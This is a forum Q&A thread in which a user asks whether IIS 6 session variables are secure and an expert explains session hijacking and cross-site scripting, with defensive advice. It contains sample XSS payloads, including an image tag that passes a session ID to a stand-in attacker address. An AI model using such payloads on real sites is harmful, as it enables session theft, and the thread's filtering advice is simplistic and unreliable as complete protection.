Link to home
Start Free TrialLog in
Avatar of loopstudio
loopstudio

asked on

Is IIS session variabels secure?

Is it in general secure?

Or is it possible for a hacker to create or change the sessions ID's or session variabels?

on IIS 6.
Avatar of R_Harrison
R_Harrison
Flag of United Kingdom of Great Britain and Northern Ireland image

The security issues with Session IDs (and session variables which are linked to session ids), are Session Hijacking and Cross Site Scripting.

Session Hijacking is where a hacker gives your web server the session id of somebody else - and the hacker will then be treated as the user who's id he gave.   This is difficult to do, because the hacker needs to get the SessionID in the first place, however this is where cross site scripting comes in, using cross site scripting a hacker can obtain the sessionids, therefore providing you prevent cross site scripting sessionid and session variables are generally secure.

You can also enhance session security by storing the IP address as a Session variable, and checking that the IP address matches on each page.  If you need code to help with this let me know.

If you do not understand cross site scripting, it is worth researching as this type of attack is becoming more and more common.
Avatar of loopstudio
loopstudio

ASKER

ok, thanx..

So if I understand u correctly...

1) It is "in general" secure
2) But it will probably be the next popular danger-zone, so its good to have it in mind and do some preventing
3) Its the "cross site scripting" that is the dangerous thing

Could You just write a little about what "cross site scripting" is?
a) Is it "only" if You have code from another URL inside a frame or iframe?
b) Or "only" if an attacker had the chance to upload a program to the server?
c) Or is it e.g. a danger-zone to have a java-applet installed and running? E.g. a chat-applet?
d) Or could it be as simple as having ads running on the website, with e.g. Flash animation ads from an advertising company?
I would have thought that web server software developers would put checks in place to make session hijacking more difficult like checking the ip address as you suggest but also checking other things like if the user agent suddenly changes etc.
Cross Site Scripting (XSS)...

Basically, any page you have that shows dynmic information i.e where you use response.write to display a variable on the web page, maybe subject to XSS.   Lets say you ask a user to input there name, and then on the next page you put their name at the top of the page.   A hacker would enter script (usually javascript or vbscript)  into the NAME box  e.g <SCRIPT>alert("HELLO")</SCRIPT>.   This script will then run on the next page...  OK so far no harm done, however suppose the <SCRIPT> called a page on another server and passed the SESSIONID variable to that server - that server being run by the hacker.   Now I have my SESSIONID.   If I can insert this SCRIPT into your a database which outputs onto a page then I could get every visitors SESSIONID - alternatively I can "PHISH" by sending out emails with a link to YOUR website which would be something like

www.mydomain.com/apage.asp?NAME=<SCRIPT>somenastyjavascripthere</SCRIPT>

Tthe variables are normally encoded as this makes them hard to read and thus fools more people into clicking the link and since it goes to your website this bypasses phishing filters, etc...

Hope this helps.

daveamour:
That would be useful, however occassionally such changes are legitimate... so would prevent us coders from really using the full power of ASP... although most of the time it would stop hackers!!!
Both of You.. its very interesting points u have there.. Thank U... ;o)

But how can they mis-use the sessionid from a user, lets say they got that?

1) All session varaibels are only existing and valid while a session is active/online right?
2) And IF a hacker can get a sessionid by a <SCRIPT>alert() tag, he can only get his own right?
3) Can he get the session variabels from a user?
OK, the hacker will use the <SCRIPT> to open either an IFRAME or an IMAGE, the source of either would be the hackers ip address, and will also pass the sessionid with the source.  
e.g  <IMG SRC="hackersaddress?SessionID=XXXXXXXX>

A hacker will replace the XXXXX with javascript code to add the sessionid.

Then whenever somebody visits the page which contains this extra code, the users browser will try and load the image from the "hackersaddress" and pass the sessionid value on to the hacker.

The way IIS works (in fact most webservers) is that session variables are stored against the SessionID - the session variables are stored on your webserver (that way they are never sent over the internet and are therefore more secure) and everytime the user request a page from your server their browser passes the sessionid to your webserver.  This allows your webserver to associate the session variables with that user.

A hacker will request a page from your webserver and pass the "stolen" sessionid to your server - your server then associates all the session variables and responds as though he is the genuine user.   Since session variable are normally used with login processes, etc the hacker will then be logged in and can access and use your site just like the genuine user, including changing passwords, placing orders, etc...

I hope this explains how session hijacking and XSS can be used to compromise security - its difficult to explain but it does work and is increasing in popularity.  If you need any clarification then just ask.
Hi Harrison,

Again thanx.. its very enlighting for me. And I can see the risk.

Just to clarify tha last part...

1) Doesnt he need to use the site while the real user is still online?
I mean, doesnt the session, and thereby the sesisonid getting deleted when the real user logs off?
And if, my guess would be that it doesnt matter he tries to use the site with a stolen sessionid, because the session is not there anymore?

2) And if the real user is not online anymore - doesnt he then have to login first?
That means he have to have allready stolen the username and password?

3) And finally, by removing all "<" and ">" from fields and URL's, then it would be impossible for the hacker to "upload" a <SCRIPT>, a <IFRAME> and <IMAGE> right?
And thereby the site would be secure against cross site scripting (XSS) ?
In response to your questions..

1. He needs to use the site while the sessionid is active - by default most webservers delete sessionids after 20 minutes of no-activity (if you have a log off page normally you would wipe out all the session variables on the log off page rendering the sessionid useless - however users are notoriously bad at logging off).  You should bear in mind hackers can automate the whole session hijacking process and can therefore keep the session alive by submitting requests to your webserver with the "stolen" sessionid until a time that suits them!

2. As above, however if your users can change their usernames and passwords then so could the hacker once he has hijacked the session and your hacker will therefore have the usernames and passwords not your geniune user.

3. Absolutely.  The key to preventing XSS is to replace all "<", ">" and "(", ")" with &lt, &gt, etc.  That way it will still display on the screen correctly, but browsers will not interept it as code to be run.   If you block XSS session hijacking becomes very difficult and generally realies on luck and patience - however you should ensure your server is generating random sessionids - these days most servers do this by default but some older servers issue sessionids in order, this allows hackers to work out which sessionids are likely to be in use without XSS.
Very informal thank U.. :)

The last thing.. Why ( & ) ?
Another thing..

IIS 6.0.. it seems like it generates session ID's that are not random!?
If you replace "<" with "<" your web browser will show "<" however it will not interept it as a command tag, thus making it safe from XSS.

IIS6 should generate random sessionid's - although this is subject to a number of things.  Make sure you have all the latest updates for IIS6, Antivirus programs, AJAX, and any other program you are running that may effect the operation of IIS.
1) I wanted to know why I also should replace the "(" and the ")" ?

2) Hmm, I believe I have the newest updates, but they are not random. Is it a special update or just the normal Windows updates?
Replacing the brackets is just a back up incase somebody manages to defeat the "<" - remember, XSS code could be written in any language so it is best to be absolutely sure that XSS is prevented.

As for the random sessionid's - unfortunately I am running IIS7 now so it is hard for me to troubleshoot, however when I was on II6 it did generate random sessionids.   As I said, check all the software is up to date on your server as some software (AJAX, etc) can interfere with IIS.
ok, thanx.. I will reward you points :)

So tell mre.. All this knowledge of Yours about this issue.. How did You get that?
Are You a former hacker, a security employee or..?
ASKER CERTIFIED SOLUTION
Avatar of R_Harrison
R_Harrison
Flag of United Kingdom of Great Britain and Northern Ireland image

Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
Hi again,

Again I want to ask about the "(" and ")" - just to be 100% sure.
You are writing something about different script languages.
Is it ONLY possible IF they come pass the "<" AND ">" ? Or would/could You write an example with the use of "(" and ")" for me? You e.g. write that its both possible via vbscript and javascript.

Thanx again
And if I e.g. just converts a single quote (') with HTMLencode, will it then also be secure? Or do I have to remove them?